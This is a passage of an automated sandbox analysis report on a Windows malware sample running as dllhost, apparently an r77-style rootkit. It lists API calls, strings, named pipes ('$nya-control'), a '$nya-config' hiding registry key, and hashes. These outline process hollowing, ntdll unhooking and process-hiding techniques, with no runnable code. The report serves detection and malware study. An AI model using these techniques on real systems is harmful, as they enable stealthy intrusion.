Part of subcall function 0000000140001274: GetProcessHeap.KERNEL32 ref: 00000001400012DF
Part of subcall function 0000000140001274: HeapAlloc.KERNEL32 ref: 00000001400012F0
Part of subcall function 0000000140001274: RegEnumValueW.ADVAPI32 ref: 000000014000134F
Part of subcall function 0000000140001274: StrCmpIW.SHLWAPI ref: 0000000140001388
Part of subcall function 0000000140001274: GetProcessHeap.KERNEL32 ref: 00000001400013C7
Part of subcall function 0000000140001274: HeapAlloc.KERNEL32 ref: 00000001400013D5
Part of subcall function 0000000140001274: GetProcessHeap.KERNEL32 ref: 00000001400013F2
Part of subcall function 0000000140001274: HeapFree.KERNEL32 ref: 0000000140001400

Strings

service_names, xrefs: 00000001400016B7
tcp_local, xrefs: 00000001400016F2
SOFTWARE\$nya-config, xrefs: 0000000140001586
tcp_remote, xrefs: 000000014000172D
process_names, xrefs: 0000000140001641
paths, xrefs: 000000014000167C
udp, xrefs: 0000000140001768
startup, xrefs: 00000001400015C9
pid, xrefs: 0000000140001606

Memory Dump Source

Source File: 00000007.00000002.2319858293.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2319330258.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2320130898.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2320217361.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_dllhost.jbxd

Similarity

API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValue
String ID: SOFTWARE\$nya-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
API String ID: 3993315683-3572789727
Opcode ID: 160cb157803c8d75397eda194766d4b99425b2e4efbbed3557b40dfd9c0fc54d
Instruction ID: 5ebcb72c0a3035c4b67d8f00751cefd31434bbf5df89411654f5c91112f76ea3
Opcode Fuzzy Hash: 160cb157803c8d75397eda194766d4b99425b2e4efbbed3557b40dfd9c0fc54d
Instruction Fuzzy Hash: 0171D3B6310A5086EB22EF66F8507D923A4FB88BC8F016125FB4D97A7ADE38C554C744

Function 0000000140002A0C Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 124
filememorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

StrCpyW.SHLWAPI ref: 0000000140002A3D
StrCatW.SHLWAPI ref: 0000000140002A4B
GetModuleHandleW.KERNEL32 ref: 0000000140002A54
GetCurrentProcess.KERNEL32 ref: 0000000140002A74
K32GetModuleInformation.KERNEL32 ref: 0000000140002A88
CreateFileW.KERNELBASE ref: 0000000140002AB8
CreateFileMappingW.KERNELBASE ref: 0000000140002AE2
MapViewOfFile.KERNELBASE ref: 0000000140002B05
lstrcmpiA.KERNEL32 ref: 0000000140002B5B
VirtualProtect.KERNEL32 ref: 0000000140002B8E
VirtualProtect.KERNEL32 ref: 0000000140002BBE
CloseHandle.KERNELBASE ref: 0000000140002BC7
CloseHandle.KERNEL32 ref: 0000000140002BD0
FreeLibrary.KERNEL32 ref: 0000000140002BD9

Strings

.text, xrefs: 0000000140002B54
C:\Windows\System32\, xrefs: 0000000140002A2F

Memory Dump Source

Source File: 00000007.00000002.2319858293.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2319330258.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2320130898.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2320217361.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_dllhost.jbxd

Similarity

API ID: FileHandle$CloseCreateModuleProtectVirtual$CurrentFreeInformationLibraryMappingProcessViewlstrcmpi
String ID: .text$C:\Windows\System32\
API String ID: 2721474350-832442975
Opcode ID: c686aa51e377184264062a0a3ec39641cbabcbb6b6338b4f9c9e14a722750aea
Instruction ID: 2da0f49b8f504828cf99bd1c35657877bba6dbaefb57c64c0b3462adf03dc19e
Opcode Fuzzy Hash: c686aa51e377184264062a0a3ec39641cbabcbb6b6338b4f9c9e14a722750aea
Instruction Fuzzy Hash: 59517BB230468086EB62DF16F9587DA73A1FB8CBD5F444625AF4A03BA8DF38C548C704

Function 00000001400036F4 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 40
sleepfilepipeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0000000140002300: AllocateAndInitializeSid.ADVAPI32 ref: 000000014000234F
Part of subcall function 0000000140002300: SetEntriesInAclW.ADVAPI32 ref: 0000000140002397
Part of subcall function 0000000140002300: LocalAlloc.KERNEL32 ref: 00000001400023A7
Part of subcall function 0000000140002300: InitializeSecurityDescriptor.ADVAPI32 ref: 00000001400023BB
Part of subcall function 0000000140002300: SetSecurityDescriptorDacl.ADVAPI32 ref: 00000001400023D2
Part of subcall function 0000000140002300: CreateNamedPipeW.KERNELBASE ref: 0000000140002413

Sleep.KERNEL32 ref: 0000000140003719
ConnectNamedPipe.KERNELBASE ref: 0000000140003726
ReadFile.KERNEL32 ref: 0000000140003749
WriteFile.KERNEL32 ref: 0000000140003777
Sleep.KERNEL32 ref: 0000000140003784
DisconnectNamedPipe.KERNEL32 ref: 000000014000378D

Strings

M, xrefs: 000000014000376A
\\.\pipe\$nya-childproc, xrefs: 0000000140003701

Memory Dump Source

Source File: 00000007.00000002.2319858293.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2319330258.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2320130898.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2320217361.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_dllhost.jbxd

Similarity

API ID: NamedPipe$DescriptorFileInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesLocalReadWrite
String ID: M$\\.\pipe\$nya-childproc
API String ID: 2203880229-802795868
Opcode ID: a9b0775309c1033bdde321130d9dbfa8a5fd9d512a1023e9268893db04bfe7f9
Instruction ID: 5f21e6060fcfdf5e456d3793ca8ca668dea709d71954cc69c9167fab55033164
Opcode Fuzzy Hash: a9b0775309c1033bdde321130d9dbfa8a5fd9d512a1023e9268893db04bfe7f9
Instruction Fuzzy Hash: 0E1179F1208A4082E726EB22F8147EA6760E78DBE0F444225FB5A036F5CF7CC548CB00

Function 0000000140002CB0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36
sleeppipefileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0000000140002300: AllocateAndInitializeSid.ADVAPI32 ref: 000000014000234F
Part of subcall function 0000000140002300: SetEntriesInAclW.ADVAPI32 ref: 0000000140002397
Part of subcall function 0000000140002300: LocalAlloc.KERNEL32 ref: 00000001400023A7
Part of subcall function 0000000140002300: InitializeSecurityDescriptor.ADVAPI32 ref: 00000001400023BB
Part of subcall function 0000000140002300: SetSecurityDescriptorDacl.ADVAPI32 ref: 00000001400023D2
Part of subcall function 0000000140002300: CreateNamedPipeW.KERNELBASE ref: 0000000140002413

Sleep.KERNEL32 ref: 0000000140002CD5
ConnectNamedPipe.KERNELBASE ref: 0000000140002CE2
ReadFile.KERNELBASE ref: 0000000140002D05
Sleep.KERNEL32 ref: 0000000140002D26
DisconnectNamedPipe.KERNELBASE ref: 0000000140002D2F

Strings

\\.\pipe\$nya-control, xrefs: 0000000140002CBD

Memory Dump Source

Source File: 00000007.00000002.2319858293.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2319330258.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2320130898.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2320217361.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_dllhost.jbxd

Similarity

API ID: NamedPipe$DescriptorInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesFileLocalRead
String ID: \\.\pipe\$nya-control
API String ID: 2071455217-2728758917
Opcode ID: ea5d0e36b259e0d9586660e08200355551478b737e680bb1466d0a5669cd7301
Instruction ID: fae886f8300dcbc0ba88151123110c58f904b6dff6578ae57d5354566521a009
Opcode Fuzzy Hash: ea5d0e36b259e0d9586660e08200355551478b737e680bb1466d0a5669cd7301
Instruction Fuzzy Hash: 6F011AB1214A0482FB16EB23F8547E9A360A79DBE1F154225FB67436F5DF78C888C704

Function 0000000140003634 Relevance: 9.1, APIs: 6, Instructions: 58
memorysleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 000000014000364F
HeapAlloc.KERNEL32 ref: 0000000140003663
GetProcessHeap.KERNEL32 ref: 000000014000366C
HeapAlloc.KERNEL32 ref: 000000014000367A
K32EnumProcesses.KERNEL32 ref: 0000000140003695
Sleep.KERNEL32 ref: 00000001400036EA

Memory Dump Source

Source File: 00000007.00000002.2319858293.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2319330258.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2320130898.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2320217361.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_dllhost.jbxd

Similarity

API ID: Heap$AllocProcess$EnumProcessesSleep
String ID:
API String ID: 3676546796-0
Opcode ID: 81151b99d530d65dfa122e6c8ce9ef601985b82c456e08e1a9a7be0ad97868de
Instruction ID: a1b66254d96c7cf11d413aba10b9c6aee428658a90ca8d6027ab0afa1d9e2250
Opcode Fuzzy Hash: 81151b99d530d65dfa122e6c8ce9ef601985b82c456e08e1a9a7be0ad97868de
Instruction Fuzzy Hash: 2C1160B270065196E716DB17F81475A7AA6F789BC1F558128EF4207B78CF3AD884CB40

Function 000000014000200C Relevance: 9.1, APIs: 6, Instructions: 55
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(?,?,00000000,0000000140002F50), ref: 0000000140002021
HeapAlloc.KERNEL32(?,?,00000000,0000000140002F50), ref: 0000000140002032

Part of subcall function 0000000140001CF0: GetProcessHeap.KERNEL32 ref: 0000000140001D23
Part of subcall function 0000000140001CF0: HeapAlloc.KERNEL32 ref: 0000000140001D36
Part of subcall function 0000000140001CF0: GetProcessHeap.KERNEL32 ref: 0000000140001D44
Part of subcall function 0000000140001CF0: HeapAlloc.KERNEL32 ref: 0000000140001D55
Part of subcall function 0000000140001CF0: K32EnumProcesses.KERNEL32 ref: 0000000140001D6F
Part of subcall function 0000000140001CF0: OpenProcess.KERNEL32 ref: 0000000140001D9D
Part of subcall function 0000000140001CF0: K32EnumProcessModulesEx.KERNEL32 ref: 0000000140001DCA
Part of subcall function 0000000140001CF0: ReadProcessMemory.KERNEL32 ref: 0000000140001E01
Part of subcall function 0000000140001CF0: CloseHandle.KERNELBASE ref: 0000000140001E46
Part of subcall function 0000000140001CF0: GetProcessHeap.KERNEL32 ref: 0000000140001E58
Part of subcall function 0000000140001CF0: RtlFreeHeap.NTDLL ref: 0000000140001E66
Part of subcall function 0000000140001CF0: GetProcessHeap.KERNEL32 ref: 0000000140001E6C
Part of subcall function 0000000140001CF0: RtlFreeHeap.NTDLL ref: 0000000140001E7A

OpenProcess.KERNEL32 ref: 0000000140002079
TerminateProcess.KERNEL32 ref: 000000014000208C
CloseHandle.KERNEL32 ref: 0000000140002095
GetProcessHeap.KERNEL32 ref: 00000001400020A5

Memory Dump Source

Source File: 00000007.00000002.2319858293.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2319330258.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2320130898.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2320217361.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_dllhost.jbxd

Similarity

API ID: HeapProcess$Alloc$CloseEnumFreeHandleOpen$MemoryModulesProcessesReadTerminate
String ID:
API String ID: 1323846700-0
Opcode ID: 9e888eed53e2bb10b5f797a2cff84821bb432324b3c6bbcbdbea6ae691bf0545
Instruction ID: 146a1b11f62a0205da1b5a2207c4e551d66db48d886c31f99c97199126aec534
Opcode Fuzzy Hash: 9e888eed53e2bb10b5f797a2cff84821bb432324b3c6bbcbdbea6ae691bf0545
Instruction Fuzzy Hash: 77114CB1B0564086FB16DF27B84439A66A1AB8DBD4F488028FF0903776EE39C4868704

Function 0000000140002D38 Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0000000140002D4C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002D74
Part of subcall function 0000000140002D4C: OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002D84
Part of subcall function 0000000140002D4C: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002D9E
Part of subcall function 0000000140002D4C: LookupPrivilegeValueW.ADVAPI32 ref: 0000000140002DB5
Part of subcall function 0000000140002D4C: AdjustTokenPrivileges.KERNELBASE ref: 0000000140002DED
Part of subcall function 0000000140002D4C: GetLastError.KERNEL32 ref: 0000000140002DF7
Part of subcall function 0000000140002D4C: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002E00
Part of subcall function 0000000140002D4C: RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002E29
Part of subcall function 0000000140002D4C: RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002E59
Part of subcall function 0000000140002D4C: RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002E89
Part of subcall function 0000000140002D4C: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002E9D
Part of subcall function 0000000140002D4C: HeapAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002EAB
Part of subcall function 0000000140002D4C: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002EBE
Part of subcall function 0000000140002D4C: HeapAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002ECC

ExitProcess.KERNEL32 ref: 0000000140002D43

Memory Dump Source

Source File: 00000007.00000002.2319858293.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2319330258.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2320130898.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2320217361.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_dllhost.jbxd

Similarity

API ID: Process$Heap$OpenValue$AllocQueryToken$AdjustCloseCurrentErrorExitHandleLastLookupPrivilegePrivileges
String ID:
API String ID: 2472495637-0
Opcode ID: 79b4bc089e26725b3875790e3276540c07806726462858758fa47b4ded48d988
Instruction ID: 466ff6e6ce30b805044d1f2dc35dca8baccd3c328fc793c3ea1e6e53ebee4899
Opcode Fuzzy Hash: 79b4bc089e26725b3875790e3276540c07806726462858758fa47b4ded48d988
Instruction Fuzzy Hash: 15A002F0F2258083EB0AB7B7B85A3DD25B1ABAC781F100416B2024B2B3DE3C48954759

Non-executed Functions

Function 0000000140002434 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 317
injectionthreadmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNEL32 ref: 000000014000252A
VirtualAllocEx.KERNEL32 ref: 0000000140002581
WriteProcessMemory.KERNEL32 ref: 00000001400025A9
VirtualProtectEx.KERNEL32 ref: 00000001400025D4
WriteProcessMemory.KERNEL32 ref: 0000000140002613
VirtualProtectEx.KERNEL32 ref: 000000014000265D
VirtualAlloc.KERNEL32 ref: 0000000140002693
GetThreadContext.KERNEL32 ref: 00000001400026B6
WriteProcessMemory.KERNEL32 ref: 00000001400026E1
SetThreadContext.KERNEL32 ref: 0000000140002704
ResumeThread.KERNEL32 ref: 0000000140002717
VirtualAllocEx.KERNEL32 ref: 0000000140002759
WriteProcessMemory.KERNEL32 ref: 0000000140002781
VirtualProtectEx.KERNEL32 ref: 00000001400027AB
WriteProcessMemory.KERNEL32 ref: 00000001400027EA
VirtualProtectEx.KERNEL32 ref: 0000000140002834
VirtualAlloc.KERNEL32 ref: 0000000140002869
Wow64GetThreadContext.KERNEL32 ref: 0000000140002887
WriteProcessMemory.KERNEL32 ref: 00000001400028AC
Wow64SetThreadContext.KERNEL32 ref: 00000001400028CA
OpenProcess.KERNEL32 ref: 00000001400028E6
TerminateProcess.KERNEL32 ref: 00000001400028F6

Part of subcall function 00000001400020CC: GetModuleHandleA.KERNEL32(?,?,00000000,0000000140002C18), ref: 00000001400020DC
Part of subcall function 00000001400020CC: GetProcAddress.KERNEL32(?,?,00000000,0000000140002C18), ref: 00000001400020EF

Strings

@, xrefs: 0000000140002751
h, xrefs: 00000001400024EE
RtlGetVersion, xrefs: 000000014000249B
NtUnmapViewOfSection, xrefs: 000000014000253C

Memory Dump Source

Source File: 00000007.00000002.2319858293.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2319330258.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2320130898.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2320217361.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_dllhost.jbxd

Similarity

API ID: Process$Virtual$MemoryWrite$Thread$AllocContextProtect$Wow64$AddressCreateHandleModuleOpenProcResumeTerminate
String ID: @$NtUnmapViewOfSection$RtlGetVersion$h
API String ID: 1036100660-1371749706
Opcode ID: 062723520bc959b99614c26b60837a5fa848bce833f489094e5110284047cdb9
Instruction ID: fe181f3da7762b1cf8407140d3e190fa013b7b60483d6e0a4c0671c43d788581
Opcode Fuzzy Hash: 062723520bc959b99614c26b60837a5fa848bce833f489094e5110284047cdb9
Instruction Fuzzy Hash: ACD16FB270568187EB65CF63F84479AB7A0F788BC4F044025EB8A47BA4DF78D599CB04

Function 0000000140001274 Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 136
memoryregistrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 00000001400012D1
GetProcessHeap.KERNEL32 ref: 00000001400012DF
HeapAlloc.KERNEL32 ref: 00000001400012F0
RegEnumValueW.ADVAPI32 ref: 000000014000134F
StrCmpIW.SHLWAPI ref: 0000000140001388
StrCmpW.SHLWAPI ref: 0000000140001390
GetProcessHeap.KERNEL32 ref: 00000001400013C7
HeapAlloc.KERNEL32 ref: 00000001400013D5
GetProcessHeap.KERNEL32 ref: 00000001400013F2
HeapFree.KERNEL32 ref: 0000000140001400
lstrlenW.KERNEL32 ref: 0000000140001409
GetProcessHeap.KERNEL32 ref: 0000000140001417
HeapAlloc.KERNEL32 ref: 0000000140001425
StrCpyW.SHLWAPI ref: 0000000140001447
GetProcessHeap.KERNEL32 ref: 000000014000145E
HeapFree.KERNEL32 ref: 000000014000146C

Strings

d, xrefs: 0000000140001312

Memory Dump Source

Source File: 00000007.00000002.2319858293.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2319330258.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2320130898.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2320217361.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_dllhost.jbxd

Similarity

API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
String ID: d
API String ID: 2005889112-2564639436
Opcode ID: 3db9478a101194b55b940351d2e6744c1199954fa76c07e8abb2f2f05a3be27a
Instruction ID: cbe0a9e96035c6652df35f1bebe582e7c0167c489293dce8c24ece8bd57d0938
Opcode Fuzzy Hash: 3db9478a101194b55b940351d2e6744c1199954fa76c07e8abb2f2f05a3be27a
Instruction Fuzzy Hash: C35128B2604B8486EB56DF62F4483AA77A1F78CBD5F444124EB4A07B79DF38C555C700

Function 000000014000217C Relevance: 13.6, APIs: 9, Instructions: 100memorycomCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 0000000140002192
SysAllocString.OLEAUT32 ref: 00000001400021A2
CoInitializeEx.OLE32 ref: 00000001400021AF
CoInitializeSecurity.OLE32 ref: 00000001400021E6
CoCreateInstance.OLE32 ref: 0000000140002226
VariantInit.OLEAUT32 ref: 0000000140002238
CoUninitialize.OLE32 ref: 00000001400022D2
SysFreeString.OLEAUT32 ref: 00000001400022DB
SysFreeString.OLEAUT32 ref: 00000001400022E4

Memory Dump Source

Source File: 00000007.00000002.2319858293.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2319330258.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2320130898.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2320217361.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_dllhost.jbxd

Similarity

API ID: String$AllocFreeInitialize$CreateInitInstanceSecurityUninitializeVariant
String ID:
API String ID: 4184240511-0
Opcode ID: 84ff88ccb10f49b49e4af97301c9a9495f723d3e4f2f51ef83b7847e1ee965a3
Instruction ID: 0e6833bd3eeca7de3220de005558475a35c56d9be5ad7e086776b2a4e8a7938b
Opcode Fuzzy Hash: 84ff88ccb10f49b49e4af97301c9a9495f723d3e4f2f51ef83b7847e1ee965a3
Instruction Fuzzy Hash: 894147B2700A859AE711CF6AE8843DD73B1FB89B89F445225FF0A43A69DF38C159C304

Function 000000014000104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 00000001400010B1
RegEnumValueW.ADVAPI32 ref: 0000000140001117
GetProcessHeap.KERNEL32 ref: 000000014000115A
HeapAlloc.KERNEL32 ref: 0000000140001168
GetProcessHeap.KERNEL32 ref: 0000000140001185
HeapFree.KERNEL32 ref: 0000000140001193

Strings

d, xrefs: 00000001400010D6

Memory Dump Source

Source File: 00000007.00000002.2319858293.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2319330258.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2320130898.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2320217361.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_dllhost.jbxd

Similarity

API ID: Heap$Process$AllocEnumFreeInfoQueryValue
String ID: d
API String ID: 3743429067-2564639436
Opcode ID: e46bc08d923f3710a6f0b6657d2c3335541900ed0314ce9ea7860df7b3fef6c0
Instruction ID: 42b997484051ce9e6daf6bc3104cf1544be02307d9272190f1dec121864cc25c
Opcode Fuzzy Hash: e46bc08d923f3710a6f0b6657d2c3335541900ed0314ce9ea7860df7b3fef6c0
Instruction Fuzzy Hash: E1412AB2214B84C6E765CF62F4447DA77A1F388B98F448129EB8907B68DF38C589CB40

Function 00000001400017A8 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 37registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32 ref: 00000001400017DC
RegDeleteKeyW.ADVAPI32 ref: 00000001400017ED
RegEnumKeyExW.ADVAPI32 ref: 000000014000182A
RegCloseKey.ADVAPI32 ref: 000000014000183B
RegDeleteKeyExW.ADVAPI32 ref: 0000000140001858

Strings

SOFTWARE\$nya-config, xrefs: 00000001400017CE, 0000000140001844

Memory Dump Source

Source File: 00000007.00000002.2319858293.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2319330258.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2320130898.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2320217361.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_dllhost.jbxd

Similarity

API ID: Delete$CloseEnumOpen
String ID: SOFTWARE\$nya-config
API String ID: 3013565938-2636501262
Opcode ID: 5400bf53effbf6b262c010f5037711af52f170679b47dd7329b1738abdbb04b9
Instruction ID: 8421849941bfc07d5c6a41991bb422c7bbd6d954f4ecfba192073c561d1589c4
Opcode Fuzzy Hash: 5400bf53effbf6b262c010f5037711af52f170679b47dd7329b1738abdbb04b9
Instruction Fuzzy Hash: 301186B2614A8485E761CF26F8447D923B4F78C7D8F405205E75D0BAA9DF7CC258CB19

Function 000000014000148C Relevance: 6.3, APIs: 5, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00000001400014B2
HeapFree.KERNEL32 ref: 00000001400014C1
GetProcessHeap.KERNEL32 ref: 00000001400014CE
HeapFree.KERNEL32 ref: 00000001400014DD
GetProcessHeap.KERNEL32 ref: 00000001400014ED

Memory Dump Source

Source File: 00000007.00000002.2319858293.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2319330258.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2320130898.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2320217361.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_dllhost.jbxd

Similarity

API ID: Heap$Process$Free
String ID:
API String ID: 3168794593-0
Opcode ID: 80d9ba640633e664d37536508cc0a4a26b735903ebb0d8b8d4ae8ea91fecf4e1
Instruction ID: ae713076178dcd36b59d2bede7e3524c8608a398496d325058d9822cf47af1f0
Opcode Fuzzy Hash: 80d9ba640633e664d37536508cc0a4a26b735903ebb0d8b8d4ae8ea91fecf4e1
Instruction Fuzzy Hash: D80102B2610A908AE705EF67B90438977A1F78CFC5F4A4025FB9953739DE38D491C744

Function 00000001400020CC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,00000000,0000000140002C18), ref: 00000001400020DC
GetProcAddress.KERNEL32(?,?,00000000,0000000140002C18), ref: 00000001400020EF

Strings

ntdll.dll, xrefs: 00000001400020D2

Memory Dump Source

Source File: 00000007.00000002.2319858293.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2319330258.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2320130898.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2320217361.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_dllhost.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: ntdll.dll
API String ID: 1646373207-2227199552
Opcode ID: 0017c025cb5e8a7c9b0335d05a9c08c4f9d8e31f703f37c02c29db0b138d9ce4
Instruction ID: 17fa8e42c722db624f1936625922d1a8ab69534039b48c71a9bb0a293c881c2b
Opcode Fuzzy Hash: 0017c025cb5e8a7c9b0335d05a9c08c4f9d8e31f703f37c02c29db0b138d9ce4
Instruction Fuzzy Hash: CAD0C9F8B1260182EF1AEB6778553E152515B6DBC9F4940209F0647772DE38C0E48318

Function 0000000140001220 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,?,00000000,0000000140001544), ref: 0000000140001226
HeapAlloc.KERNEL32(?,?,00000000,0000000140001544), ref: 0000000140001235
